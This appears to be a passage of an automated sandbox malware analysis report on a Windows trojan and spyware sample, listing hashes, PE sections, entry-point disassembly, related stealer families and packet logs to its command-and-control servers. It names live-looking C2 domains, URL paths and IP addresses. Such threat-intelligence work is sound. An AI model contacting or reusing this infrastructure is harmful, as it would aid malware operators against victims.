                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:HZhObFuFNe.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:2ba7ee5357b8762915d320630e9a59b7.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Stop behavior analysis, all processes terminated

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 4.245.163.56
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      10:35:28API Interceptor3x Sleep call for process: HZhObFuFNe.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.121.15.192t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                      • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                      hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                      • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                      u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                      • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                      TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                      • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=TmUWwkAQBKXXTWTE1734696758
                                      98.85.100.80t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                        CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                          u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                            TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                  file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                    Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          home.fivetk5ht.topt6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                          • 185.121.15.192
                                                          pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 185.121.15.192
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 185.121.15.192
                                                          httpbin.orgt6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                          • 34.226.108.155
                                                          hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                          • 34.226.108.155
                                                          pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                          • 34.226.108.155
                                                          CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                          • 34.226.108.155
                                                          u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 98.85.100.80
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 34.226.108.155
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 98.85.100.80

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          TWC-11351-NORTHEASTUSt6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 98.85.100.80
                                                          arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 72.226.210.219
                                                          hmips.elfGet hashmaliciousMiraiBrowse
                                                          • 45.46.119.24
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 98.85.100.80
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                          • 98.85.100.80
                                                          la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                          • 67.252.15.48
                                                          la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                          • 98.94.131.188
                                                          REDSERVICIOESt6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                          • 185.121.15.192
                                                          hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                          • 185.121.15.192
                                                          pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.121.15.192
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 185.121.15.192
                                                          http://blacksaltys.comGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.137

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          No created / dropped files found

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Entropy (8bit):7.985235252687234
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • VXD Driver (31/22) 0.00%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:HZhObFuFNe.exe
                                                          File size:4'470'784 bytes
                                                          MD5:2ba7ee5357b8762915d320630e9a59b7
                                                          SHA1:f4995defaafe3b084242e2b9f382c7b379938420
                                                          SHA256:9249b72e3a0443ec9df0569d0a3fbe76c52d21c1b5d69f9dfb41d40b819e3181
                                                          SHA512:6bd830e6c4aa7fce70f7dd0ca2ea5f99ae5bda4374a318a9595285e57f81ffa92a19f0e9e6c4b025252b4a54afae10a18c3182a006827791e79af98485d1c4b8
                                                          SSDEEP:98304:kWVlpHm8qq3fN2NV+5dcPUx55rJb7z2rdsdfFF9Fb4U5u9c:kWVrXpV2/EWUp1/qyBF
                                                          TLSH:8E2633FBA6EC7FC8E106DE365EE14FB978820251C6367744AC71B31484471E949EA8E3
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...........pH...@..........................@........D...@... ............................

                                                          File Icon

                                                          Icon Hash:00928e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x1091000
                                                          Entrypoint Section:.taggant
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                          DLL Characteristics:DYNAMIC_BASE
                                                          Time Stamp:0x67639809 [Thu Dec 19 03:50:33 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp 00007F6FA519776Ah
                                                          movhps xmm0, qword ptr [eax+eax+00h]
                                                          add byte ptr [eax], al
                                                          add cl, ch
                                                          add byte ptr [eax], ah
                                                          add byte ptr [eax], al
                                                          add byte ptr [ebx], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], dh
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [edx], ah
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [ecx], cl
                                                          add byte ptr [eax], 00000000h
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          adc byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add eax, 0000000Ah
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x74705f0x73.idata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x7460000x1ac.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc8fe040x10vdxoyfiw
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0xc8fdb40x18vdxoyfiw
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          0x10000x7450000x284c00e6602c426e8fa115cf1a08eab66f62b2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x7460000x1ac0x20045f79e76e15c8f28edefe53c69c2c682False0.578125data4.559253888749826IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .idata 0x7470000x10000x200e84636d45557e74dadd0f14f36394655False0.166015625data1.1471680400846989IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          0x7480000x38d0000x20050dff9698d96422a18b4f11e5deb5ac9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          vdxoyfiw0xad50000x1bb0000x1bb000927629084bdd7d42ae516e57ad856a60False0.9943814589799661data7.95517720558757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          lxmogbqr0xc900000x10000x40029398317e488515543f59d66db7e8fe6False0.716796875data5.8208275696326846IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .taggant0xc910000x30000x2200cda67ac8775dc0bbbf95f68c86a5151bFalse0.06560202205882353DOS executable (COM)0.7501659348063598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_MANIFEST0xc8fe140x152ASCII text, with CRLF line terminators0.6479289940828402

                                                          Imports

                                                          DLLImport
                                                          kernel32.dlllstrcpy

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 20, 2024 16:35:24.078973055 CET49707443192.168.2.998.85.100.80
                                                          Dec 20, 2024 16:35:24.079025030 CET4434970798.85.100.80192.168.2.9
                                                          Dec 20, 2024 16:35:24.079087019 CET49707443192.168.2.998.85.100.80
                                                          Dec 20, 2024 16:35:24.093113899 CET49707443192.168.2.998.85.100.80
                                                          Dec 20, 2024 16:35:24.093137980 CET4434970798.85.100.80192.168.2.9
                                                          Dec 20, 2024 16:35:25.834501982 CET4434970798.85.100.80192.168.2.9
                                                          Dec 20, 2024 16:35:25.835215092 CET49707443192.168.2.998.85.100.80
                                                          Dec 20, 2024 16:35:25.835246086 CET4434970798.85.100.80192.168.2.9
                                                          Dec 20, 2024 16:35:25.836683989 CET4434970798.85.100.80192.168.2.9
                                                          Dec 20, 2024 16:35:25.836734056 CET49707443192.168.2.998.85.100.80
                                                          Dec 20, 2024 16:35:25.838777065 CET49707443192.168.2.998.85.100.80
                                                          Dec 20, 2024 16:35:25.839004993 CET4434970798.85.100.80192.168.2.9
                                                          Dec 20, 2024 16:35:25.839020967 CET49707443192.168.2.998.85.100.80
                                                          Dec 20, 2024 16:35:25.883327961 CET4434970798.85.100.80192.168.2.9
                                                          Dec 20, 2024 16:35:25.890233040 CET49707443192.168.2.998.85.100.80
                                                          Dec 20, 2024 16:35:25.890245914 CET4434970798.85.100.80192.168.2.9
                                                          Dec 20, 2024 16:35:25.937093019 CET49707443192.168.2.998.85.100.80
                                                          Dec 20, 2024 16:35:26.163530111 CET4434970798.85.100.80192.168.2.9
                                                          Dec 20, 2024 16:35:26.163599968 CET4434970798.85.100.80192.168.2.9
                                                          Dec 20, 2024 16:35:26.163651943 CET49707443192.168.2.998.85.100.80
                                                          Dec 20, 2024 16:35:26.299734116 CET49707443192.168.2.998.85.100.80
                                                          Dec 20, 2024 16:35:26.299767971 CET4434970798.85.100.80192.168.2.9
                                                          Dec 20, 2024 16:35:27.752230883 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:27.871892929 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:27.871982098 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:27.873132944 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:27.993172884 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:27.993249893 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:27.993347883 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:27.993349075 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:27.993357897 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:27.993422031 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:27.993608952 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:27.993652105 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:27.993724108 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:27.993736029 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:27.993774891 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:27.993854046 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:27.993992090 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:27.994050026 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:27.994076014 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:27.996177912 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.113506079 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.113518000 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.113584042 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.113620996 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.113631010 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.113655090 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.113681078 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.113704920 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.113826036 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.113873959 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.155875921 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.156181097 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.275912046 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.276072979 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.319894075 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.443888903 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.443980932 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.643793106 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.643897057 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.862590075 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.862873077 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.862993002 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.982976913 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983014107 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983057022 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983067989 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983104944 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983114004 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983115911 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983167887 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983195066 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983198881 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983221054 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983230114 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983238935 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983273983 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983294010 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983319998 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983381033 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983411074 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983433008 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983439922 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983449936 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983469963 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983490944 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983500004 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983515024 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983536005 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983551025 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983578920 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983587027 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983633041 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983634949 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983664989 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983675957 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:28.983694077 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983746052 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983772993 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983817101 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983844042 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983877897 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983906031 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.983977079 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.984005928 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.984055996 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.984085083 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.984117031 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.984497070 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.984528065 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.984577894 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.984761000 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.989696980 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.103458881 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.103527069 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.103795052 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.103842974 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.103913069 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.103955030 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.104110003 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.104156971 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.104187965 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.104244947 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.104254961 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.104441881 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.104574919 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.104585886 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.104707003 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.105138063 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.105148077 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.105423927 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.109729052 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.109776020 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.109796047 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.109821081 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.109908104 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.109920979 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.109930038 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.109941006 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.109966040 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.109997988 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.110099077 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110110044 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110120058 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110131979 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110137939 CET4970880192.168.2.9185.121.15.192
